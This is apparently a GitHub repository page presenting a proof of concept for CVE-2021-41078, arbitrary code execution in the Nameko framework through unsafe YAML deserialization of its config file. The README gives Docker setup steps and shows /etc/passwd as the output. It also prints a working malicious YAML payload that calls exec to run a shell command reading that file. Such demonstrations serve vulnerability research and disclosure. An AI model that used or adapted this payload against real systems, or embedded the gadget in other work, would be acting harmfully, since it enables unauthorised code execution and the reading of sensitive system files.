Skip to content
/ CVE-2021-41078 Public

nameko Arbitrary code execution due to YAML deserialization

License

MIT license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

s-index/CVE-2021-41078

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
Dockerfile
Dockerfile
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
malicious.yml
malicious.yml
 
 

Repository files navigation

CVE-2021-41078

nameko Arbitrary code execution due to YAML deserialization

NVD Description

Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.

Demo

cve-2021-41078

Set Up

  1. Build an image from a Dockerfile
docker build -t cve-2021-41078 .
  1. Run python main.py in a new container
docker run -it --rm cve-2021-41078

output /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

output-image

PoC Payload

malicious.yml

!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

Reference

About

nameko Arbitrary code execution due to YAML deserialization

Topics

python nameko code-execution unsafe-yaml-load cve-2021-41078

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Languages